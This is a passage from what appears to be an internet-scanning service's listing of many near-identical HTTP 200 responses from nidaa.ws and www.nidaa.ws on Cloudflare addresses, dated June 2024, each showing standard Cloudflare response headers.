    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uu1RVrX4tEF9mQlISzKxE%2BuQiz9OPoJehroo18crIgOXhmSb3NA6rya9DVXCKbt0qjE0ywm496mLsdOLGCjFc%2Fu6IQL2LvFYmv%2B0B7nRR92JCAkZq0gMzZuNCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 894a368d4f59af2b-NRT
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-16 by HttpPlugin
    Create report
  • Open service 188.114.97.3:80 · www.nidaa.ws

    2024-06-16 08:56

    HTTP/1.1 200 OK
    Date: Sun, 16 Jun 2024 08:56:20 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rnzch6zQ7hsZ%2BMsbs9yACIPidTTrZjQih%2B1cHnbBwsDzOdaklXrm21neCLpugD2Hj1Ggs9LYbENVwXpbIeZEBeojpLKXuHAWfkenp6w1oQO01syuA2YZMygOTIcNytE%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 89499608acd59493-LHR
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-16 by HttpPlugin
    Create report
  • Open service 188.114.97.3:80 · www.nidaa.ws

    2024-06-12 21:41

    HTTP/1.1 200 OK
    Date: Wed, 12 Jun 2024 21:41:51 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=STqqLqPI%2FVXLQYoRIdOghmmDS4a1xd%2F68dZuwcNa18fxlPM%2BpfrqgUHVRV2EDjV2%2FA1trYgFZsZqZpap2rwuzJ8IL1w6Qa8UEabrQdWA8%2FT8LynUOh6xaX4erkOakrs%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 892d01e68a162bd3-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-12 by HttpPlugin
    Create report
  • Open service 188.114.97.3:80 · www.nidaa.ws

    2024-06-12 21:01

    HTTP/1.1 200 OK
    Date: Wed, 12 Jun 2024 21:01:15 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C5eB5b02nJMysuJdJwsEn%2BjuvN6MsaWc3BzE9YplMGYmPPQTDKXzrEIGLr2%2Fz9coStgtXsUpYimzqpAB%2FwDhDQuGGUBiSzaZENNP%2BKEJjjDX5e8SPvNkg6w%2BpxsfkJg%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 892cc66be9d994cf-LHR
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-12 by HttpPlugin
    Create report
  • Open service 188.114.97.9:80 · nidaa.ws

    2024-06-12 20:12

    HTTP/1.1 200 OK
    Date: Wed, 12 Jun 2024 20:12:15 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2PX839Kd5Vmnh1DtmcsQAI5I3S2hXKt22LUvCKJ08B4TlajFDQOek7henwQe8sXU%2B8AlY9jy1W%2F87RXojrWkdP37bpOKmU7xSL3VIz23GDP9j9ptsxjXw4%2Bvfg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 892c7ea6b8b39226-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-12 by HttpPlugin
    Create report
  • Open service 188.114.97.3:443 · www.nidaa.ws

    2024-06-12 13:35

    HTTP/1.1 200 OK
    Date: Wed, 12 Jun 2024 13:35:33 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ZYLp%2BJWt4r7z0BwG3qFBUtOhiiEsqc4HzaKz3CTennXWLQkdy%2B7llaqBfCzzaVPKKvR770qrIXjKuyZbgKtQyVkvYBaNFgX4RsxpD5Qw3njjYmO0RnlrZ%2BmgWLC0aQ%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 892a3988ceef39e5-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-12 by HttpPlugin
    Create report
  • Open service 188.114.96.9:443 · nidaa.ws

    2024-06-12 12:37

    HTTP/1.1 200 OK
    Date: Wed, 12 Jun 2024 12:37:12 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X1MNz2KJwmY8MSh09b87nSEzZtpBmyJLw1cbbo3Q18TT7JmdjlkLhl%2FJWu6z8SAlBhG5CWCj24ot2kJ71Tqik5lsd9%2BqoHcfuZiddoWdrA5oTWHtkHF58DfEvQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8929e40fdbdc94d9-LHR
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-12 by HttpPlugin
    Create report
  • Open service 188.114.97.3:443 · www.nidaa.ws

    2024-06-12 10:38

    HTTP/1.1 200 OK
    Date: Wed, 12 Jun 2024 10:38:28 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4aMGeXfZKfz0kUo8%2Bh3xPg6VfX9YHNQ9ka1%2BB4V8DLfkCq64NSnH2kzC3HTcQcPXqEy4%2FKFg5VpzD0pxWgreJPFBFyF3uapGpDBE%2FqtQDn1U7ywIwF8ANrJm8L2M4AU%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 892936213e977d02-EWR
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-12 by HttpPlugin
    Create report
  • Open service 188.114.97.9:80 · nidaa.ws

    2024-06-12 01:57

    HTTP/1.1 200 OK
    Date: Wed, 12 Jun 2024 01:57:12 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pnutX4ehgnXa75ILa6v01uX6SH0%2Bk8PStLhPXsNs2Hj1cpACc55lR1WAwIvq9D2%2FTdLt70bogt6C4jk6w3LFxHrBXUZl6rcjGhEo53vEt9%2BH95Jtnblm%2F3KANQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 89263a8fe86703b8-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-12 by HttpPlugin
    Create report
  • Open service 188.114.96.9:443 · nidaa.ws

    2024-06-12 01:14

    HTTP/1.1 200 OK
    Date: Wed, 12 Jun 2024 01:14:34 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WfoL4WLNJP%2BBDS4Kmc971rTk2v8HWv%2B%2FNwO0SX4dNbqS%2B3wFl0mvIrnQfZhSlCK68P31zSHfgUqhibnTjK8ZPaYqEF8QkOd8BqqMr%2FI64xZTUbWA4pZurh4JcA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8925fc1fbff13605-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-12 by HttpPlugin
    Create report
  • Open service 188.114.97.3:80 · www.nidaa.ws

    2024-06-10 19:05

    HTTP/1.1 200 OK
    Date: Mon, 10 Jun 2024 19:05:35 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FMqL6mVtqIQyZ5XIofxXNsXkHmbC5SZlFndHTXf%2Bbxg%2Fy5ePhr7FkjasYARsSdPFr3XinClclgBBLxMx%2FNSKo7PNoyFiXBUcCyLv5c8hL2H1KXZeI%2Fu89H2Jf4YbM%2B0%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 891ba23d3986aae5-YYZ
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-10 by HttpPlugin
    Create report
  • Open service 188.114.96.9:443 · nidaa.ws

    2024-06-10 17:10

    HTTP/1.1 200 OK
    Date: Mon, 10 Jun 2024 17:10:05 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5VCL0PG4cGVMruIxfE0sYsBac6Gpjx3YPuFwzkOJ5RJfXRbosts5cagS1HgRJbRpgIZJeZA2Qma23A%2FT47ZM%2BNwQnZ24RG5W%2FzWb%2Fy31Kn%2FSyqCFNOk0LaRKzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 891af908cb4a7aaa-SJC
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-10 by HttpPlugin
    Create report
  • Open service 188.114.97.9:80 · nidaa.ws

    2024-06-10 15:12

    HTTP/1.1 200 OK
    Date: Mon, 10 Jun 2024 15:12:47 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Vi7UfwKDqlGwVnh16Zz%2F2RWszoWmHoqeY0tdLGnQLjzXyIWeAT7JSm9dTR3SsPip%2F%2Fsergt9sylHGuY5%2BP7K0vTm6bK2OemGZxIZRlk4P5mEjs2V%2BbpNRHLVw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 891a4d3b09d92be9-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-10 by HttpPlugin
    Create report
  • Open service 188.114.96.9:443 · nidaa.ws

    2024-06-10 14:45

    HTTP/1.1 200 OK
    Date: Mon, 10 Jun 2024 14:45:45 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H1he7mf3NRaKglujllf8Uzc4gzLBLQX3P6rM8Gl304XHceq5RM%2BevTFbx4keQLoVqWJ51xSBZyxkknj%2BRp1lVpj6LLr89EWlfZCKTIUjTGMWH9M1YhkjcUistQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 891a25a0cbdb9b31-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-10 by HttpPlugin
    Create report
  • Open service 188.114.97.9:80 · nidaa.ws

    2024-06-10 10:10

    HTTP/1.1 200 OK
    Date: Mon, 10 Jun 2024 10:10:15 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cJ3hjO%2FkeE6JKZORiaL0d545oR%2FdMH9EWucVsAD1UCowaGU1V2aHZhDYNILA0%2Fx6%2BtqKV8BHQl3adsM9UZGisTe1SztZONE4Qjh%2Ft%2F%2F1FuTiIVOTYRj4CabiPQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8918920e49e08f3f-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-10 by HttpPlugin
    Create report
  • Open service 188.114.97.3:443 · www.nidaa.ws

    2024-06-10 09:33

    HTTP/1.1 200 OK
    Date: Mon, 10 Jun 2024 09:33:44 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7QNA0UY66Wrx7Xn%2BumeqvpCzkw0ms9%2BLzJrswxha8wgaLclMlkinzjGWVnBzVkxHILcswtueg6aHyayeMX4Yrhr%2Fm4v%2Bi4nu6GMOVjAUcdtBh5eaPyRuhhTI1jZxveY%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 89185c903adfac78-YYZ
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-10 by HttpPlugin
    Create report
  • Open service 188.114.97.3:443 · www.nidaa.ws

    2024-06-10 09:33

    HTTP/1.1 200 OK
    Date: Mon, 10 Jun 2024 09:33:43 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=acOi7FfcPkYLSB4K%2ByO0ewbETwadeglo8I46c%2Bvux5%2B1U6EqhB0eyXqbvxhrLzrttrs1p5ksyzKwgbYXownAtPmKVpfXshFCaALxMYaRZYgs7METzIi8qiMlDHAEn6g%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 89185c8c5b1fab1b-YYZ
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-10 by HttpPlugin
    Create report
  • Open service 188.114.97.3:80 · www.nidaa.ws

    2024-06-10 01:24

    HTTP/1.1 200 OK
    Date: Mon, 10 Jun 2024 01:24:08 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OnCGF0Y30YEV6ftseqkspSONE%2FkEokpEWoa16npB1dfl0f%2BtDHsv4bt9AaWeEvcmyy1YaasXGMSHD8vrtL8nDBlMeLo9vA070ZVscyiNAw%2BP8igC5phXnnOoenFS%2F4M%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 89158f622da09748-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-10 by HttpPlugin
    Create report
  • Open service 188.114.97.3:80 · www.nidaa.ws

    2024-06-08 19:28

    HTTP/1.1 200 OK
    Date: Sat, 08 Jun 2024 19:28:38 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bhKIJQt3mU28UP0R6zxjhTUOCgV%2FbFBBrZbS1P6jbTlop6OgOLxsEdMXtgDTAuGPTzVswjHPq7Vjg%2BnVdGxWUUgqqODRuLc0kBAsqkQm6GVdO4IbBVm94i2pm9FxElc%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 890b493c7bcf7e2b-SJC
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-08 by HttpPlugin
    Create report
  • Open service 188.114.97.3:80 · www.nidaa.ws

    2024-06-08 18:53

    HTTP/1.1 200 OK
    Date: Sat, 08 Jun 2024 18:53:01 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1jtCpef96uzQW%2FqSfWTJepx5AYHU3uu3iqi3nW0VkU3rnqGhR8xKwo86gC1ynkzLJJzhxQv0NXfkgBS4KSMtWsWOiIjGV3KqC5tPQ6eH%2FfzOok03pSjm35MSGnaWV98%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 890b1511bf8bac5a-YYZ
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-08 by HttpPlugin
    Create report
  • Open service 188.114.97.9:80 · nidaa.ws

    2024-06-08 17:49

    HTTP/1.1 200 OK
    Date: Sat, 08 Jun 2024 17:49:27 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NBGCEYWWfdgEXSI%2FfFbQeHm4YKdQ70KUSKb6NSqzejArc4tBDcdvdXoa8nRXrZa61t1mU5i3IBrLfOPWwy5MAtymr4%2B9%2ByW8f6ZmgON0Rz7XOGCHH2YZPfQdCw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 890ab7f52af3971a-AMS
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-08 by HttpPlugin
    Create report
  • Open service 188.114.97.3:443 · www.nidaa.ws

    2024-06-08 16:06

    HTTP/1.1 200 OK
    Date: Sat, 08 Jun 2024 16:06:33 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oQZwMDSau69VLRo4gdsCmkid2EMhIxv%2BA8TBHQkLTdiOQFl656talCmzWilI3ZxzRV9u7MxxcAEnirni3irDH4O%2FtpxwimreDTXUulSecr%2FRs7errZ5Gz3zJAw9Xhp0%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 890a21356dbc406d-SIN
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-08 by HttpPlugin
    Create report
  • Open service 188.114.97.3:443 · www.nidaa.ws

    2024-06-08 16:06

    HTTP/1.1 200 OK
    Date: Sat, 08 Jun 2024 16:06:28 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HJ9j9W4yOVdzgF3lgLgnwG4Q9kWEmANUC47aJbFJQElO51wiVxELjHY4F%2BuQSyFtxumVc6DnK12iIQEqNDeSzN3Cr2ftt0a2Nph9QfEPUI3omvUhdadlck6h1EPxcSw%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 890a211c6c0943ad-EWR
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-08 by HttpPlugin
    Create report
  • Open service 188.114.96.9:443 · nidaa.ws

    2024-06-08 12:46

    HTTP/1.1 200 OK
    Date: Sat, 08 Jun 2024 12:46:37 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gAnWAy0JFc1xMVFcSytx06swQ4dHVQASkQWFYG9tAjJ7Fiulmubg90YsM8wvVeiHmOapUAaXZZHjLA7qwiOh7LT8uCRmYdu1eAtHk6Xu%2BlNkP8OIroxP1KZXbg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8908fc594e8fac5a-YYZ
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-08 by HttpPlugin
    Create report
  • Open service 188.114.96.9:443 · nidaa.ws

    2024-06-08 11:57

    HTTP/1.1 200 OK
    Date: Sat, 08 Jun 2024 11:57:54 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nr%2FN40iLerhbwY%2FI1v90O1VRXP7deVmx%2FXDFSO4T7AunP0T1cpvuhRzkoY3ot%2BpNs9wJquTbQ47Eepr7hfqpSyK9ygcD7XG0r%2FOsJpKcQ4volfH8fhPs1EyxDA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8908b4fb79c4b402-YYZ
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-08 by HttpPlugin
    Create report
  • Open service 188.114.97.9:80 · nidaa.ws

    2024-06-08 01:09

    HTTP/1.1 200 OK
    Date: Sat, 08 Jun 2024 01:09:50 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hThaRq25htY6Z1LEH8BU2zejCk9qKWwSt9eXlNXgPj85VvzraKi%2FkamA%2F9w%2B1ujZ9cspHZrx2rMN6IFqwHkFPi66uBmQczgHXT6no7Wa%2BqS2kEaTHNSe%2FyCRKQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8904ffacef15946b-LHR
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-08 by HttpPlugin
    Create report
  • Open service 188.114.97.3:80 · www.nidaa.ws

    2024-06-06 17:14

    HTTP/1.1 200 OK
    Date: Thu, 06 Jun 2024 17:14:54 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zmqAla9NRdr1gD2KLJ63Wh1hD05efh3vJDfJXTPTQr04Zel95WuzgOyORZoRGEdHufHW2kVsZEV3eo738t56rhvvnDMHUaFUIR4iFFxR0rcT0AhOsAAWPp8FYlZsIjE%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88fa0a9658bd36cc-YYZ
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-06 by HttpPlugin
    Create report
  • Open service 188.114.97.3:80 · www.nidaa.ws

    2024-06-06 16:59

    HTTP/1.1 200 OK
    Date: Thu, 06 Jun 2024 16:59:15 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=skXQkGqcAN6%2BooAvI9sUFpnU8tG4z%2Fs2S2UAEZzSAHslYVd%2FzH7EfoglBIZ01%2F9nafMuxhpOVTyPLLt0AJLoA40OvS1PToOBqSUobIKBkdHH8nR%2Fz6vFvT62MzC3slw%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88f9f3b02d5d9fae-AMS
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-06 by HttpPlugin
    Create report
  • Open service 188.114.97.9:80 · nidaa.ws

    2024-06-06 16:03

    HTTP/1.1 200 OK
    Date: Thu, 06 Jun 2024 16:03:44 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2WwPePfZ0pDA%2FqqrqSrQberLIyh5Ly4hNNbzms0iLrLmJwM%2BXaq3h5haPP9l1EN0HmNQ4P39cTqbkg9lHh6g0Dd83XGpWK%2BKdKrjR0XxJTWPp2vFSeIgZicvUg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88f9a25a58e95d7c-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-06 by HttpPlugin
    Create report
  • Open service 188.114.97.3:443 · www.nidaa.ws

    2024-06-06 12:10

    HTTP/1.1 200 OK
    Date: Thu, 06 Jun 2024 12:10:21 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CPmtNzO9fPGHKqNEqtHQXoig6sRKkrUWsSB8f%2BvyreKM%2FgHkUKvPiqA6nAOstJvnISDgKo4CAf4nMu6vMhVOAL9cm49xOTn0A%2BLrIEVeRQIVbhBVpyO4wacaAxxHd3M%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88f84c7b8e2e8c42-EWR
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-06 by HttpPlugin
    Create report
  • Open service 188.114.97.3:443 · www.nidaa.ws

    2024-06-06 12:10

    HTTP/1.1 200 OK
    Date: Thu, 06 Jun 2024 12:10:16 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XcU16dS6XLW0ULaU84nSu6dtGwHtxydstt3h2AgzTzhUsfxM9vCHDFXEo4h51mBJOaloFWvsi2UMx8PNt9eAH7pdjkLxXVaMmNMjivbbwelBI1VRh%2F%2BDIYtfFH5fzjA%3D"}],"group":"cf-nel","max_age":604800}
